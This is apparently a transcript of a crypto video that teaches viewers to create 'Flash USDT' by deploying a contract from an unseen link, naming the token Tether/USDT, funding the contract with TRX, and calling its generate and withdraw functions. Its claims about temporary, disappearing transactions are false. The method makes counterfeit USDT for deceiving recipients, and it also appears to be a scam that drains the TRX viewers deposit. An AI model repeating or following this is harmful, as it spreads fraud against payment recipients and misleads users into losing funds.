Hello guys, today we are going to learn a crypto trick. Have this thought ever came to your mind? How can we make money in this crypto bear market? So here is your answer. We will use an old crypto concept called Flash USDT. So what is Flash USDT? Flash USDT are temporary USDT transactions on compatible blockchain networks. These transactions appear in blockchain explorers and wallet histories for a limited time but do not behave like permanent on-chain transfers. Flash USDT transaction appears to the recipient. They can see the wallet balance in USDT. The transaction hash, which is a unique transaction ID for any transfer in the blockchain, is also generated for Flash USDT transfers. And you can also see the transfer history of the Flash USDT on-chain. These Flash USDT remain on-chain for 60 to 90 days. After the duration ends, the transaction disappears. This makes it perfect for training, presentations, product demos, and development testing. So what are the different ways Flash USDT can be created? Let's discuss. The first way is to use a software. USDT Flash software is a specialized tool that allows you to generate temporary USDT transactions on compatible blockchain networks. These transactions appear in blockchain explorers and wallet histories for a limited time, but do not behave like permanent on-chain transfers. These softwares can be quite expensive, and it is hard to find a working one. Another way is to generate Flash USDT using a smart contract. A smart contract is a self-executing, programmable contract with the terms of an agreement directly written into lines of code stored on a blockchain. It automatically enforces and executes predefined actions. These Flash tokens are generated briefly by using a function, what we call in crypto as Flash loans. So let's see an example on how to create Flash USDT using smart contracts. This tutorial is only for demo purpose and is not meant for anybody to perform any malicious activities. Install the TronLink wallet in your browser. I am using the Chrome browser for demo purposes. You can use any browser. To generate Flash USDT, you will need a minimum of 1,500 TRX in your wallet. Because you need a minimum of 1,000 TRX to deposit on the contract to generate Flash, and the rest you will need for gas fees. You will need to create a contract at tronide.io. I will leave a link to the smart contract in the video description. Create a new file and name it Flash USDT and paste the smart contract. The name of the smart contract is Tron Flash USDT bot. Compile the contract. Use compiler 0.5.10. Now go to Deploy and Run Transactions, and from the environment select Injected Tron Web. This will prompt you to connect your TronLink wallet. If everything is okay, your wallet address and balance will show up in the Accounts section. Now you are ready to deploy the contract on-chain. Select Contract Tron Flash USDT bot and put the token name as Tether and token symbol as USDT. Click on Transact and deploy your contract on-chain. Verify contract deployment by checking contract address on any Tron Explorer like Tron Scan. Now top up the contract with 800 TRX. This will give about 120,000 Flash USDT. Call the generate flash USDT function and generate the flash USDT. Now call withdraw function.